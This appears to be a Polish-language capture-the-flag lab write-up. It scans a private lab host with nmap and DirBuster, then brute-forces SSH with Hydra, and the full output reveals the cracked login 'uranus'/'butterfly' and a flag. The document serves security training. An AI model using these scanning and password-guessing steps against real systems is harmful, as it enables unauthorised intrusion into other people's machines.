#Zadanie 1 Ustalenie własnego adresu IP 
┌──(kali㉿kali)-[~]
└─$ ip a
#wynik
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:78:ff:ce brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.102/24 brd 192.168.56.255 scope global dynamic noprefixroute eth0
       valid_lft 576sec preferred_lft 576sec
    inet6 fe80::a00:27ff:fe78:ffce/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever



#Zadanie 2 Ustalenie maski podsieci
┌──(kali㉿kali)-[~]
└─$ ifconfig
#wynik
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.56.102  netmask 255.255.255.0  broadcast 192.168.56.255
        inet6 fe80::8e48:2c34:1:b4a9  prefixlen 64  scopeid 0x20<link>
        ether 08:00:27:b1:9d:67  txqueuelen 1000  (Ethernet)
        RX packets 9  bytes 1070 (1.0 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 24  bytes 3124 (3.0 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 5  bytes 328 (328.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 5  bytes 328 (328.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0


#Zadanie 3 Ustalenie adresów IP innych aktywnych hostów w tej samej sieci
──(kali㉿kali)-[~]
└─$ nmap -sn 192.168.56.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2023-07-01 05:16 EDT
#wynik
Nmap scan report for 192.168.56.101
Host is up (0.0015s latency).
Nmap scan report for 192.168.56.102
Host is up (0.000053s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 23.33 seconds



#Zadanie 4 Ustalenie otwartych portów na innych znalezionych hostach
──(kali㉿kali)-[~]
└─$ nmap -p- 192.168.56.101 
Starting Nmap 7.92 ( https://nmap.org ) at 2023-07-01 05:35 EDT
Nmap scan report for 192.168.56.101
Host is up (0.00018s latency).
Not shown: 65532 closed tcp ports (conn-refused)
#wynik
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http


#Zadanie 5 Ustalenie nazwy oraz wersji oprogramowania dla wszystkich usług na innych hostach
┌──(kali㉿kali)-[~]
└─$  nmap -p- -sV 192.168.56.101/24 
Starting Nmap 7.92 ( https://nmap.org ) at 2023-07-01 05:36 EDT
Nmap scan report for 192.168.56.101
Host is up (0.00020s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.5
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel


#Zadanie 6 Przeprowadzenie ataku brute-force
Otwieramy DirBuster, następnie w "Target URL" wpisujemy "http://192.168.56.101:80". Klikamy na "Browse -> 2* up on level -> 
-> usr -> share -> wordlists -> dirbuster -> directory-list-2.3-medium.txt"
Rozpoczynamy wyszukiwanie. Po przeskanowaniu wybieramy "Results-Tree View" -> requests -> urgent.txt
Wyszukujemy w przeglądarce hasło "rockyou-10", pojawi się lista haseł na stronie github.com. Zapisujemy ją. Tworzymy również listę z nazwami planet, w celu odnalezienia loginu.

┌──(kali㉿kali)-[~]
└─$ hydra -L /home/kali/login.txt -P /home/kali/rocky_10.txt ssh://192.168.56.101
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-07-09 06:01:59
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1656 login tries (l:18/p:92), ~104 tries per task
[DATA] attacking ssh://192.168.56.101:22/
[STATUS] 140.00 tries/min, 140 tries in 00:01h, 1519 to do in 00:11h, 13 active
[STATUS] 118.00 tries/min, 354 tries in 00:03h, 1305 to do in 00:12h, 13 active
[STATUS] 109.14 tries/min, 764 tries in 00:07h, 895 to do in 00:09h, 13 active
[STATUS] 106.92 tries/min, 1283 tries in 00:12h, 376 to do in 00:04h, 13 active
[22][ssh] host: 192.168.56.101   login: uranus   password: butterfly
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 4 final worker threads did not complete until end.
[ERROR] 4 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-07-09 06:17:02

Mając login i hasło, logujemy się do maszyny SDA.
uranus@vm-sda:~$ ls
user.txt
uranus@vm-sda:~$ cat user.txt
#cel 1
flag{h4ck3r} 
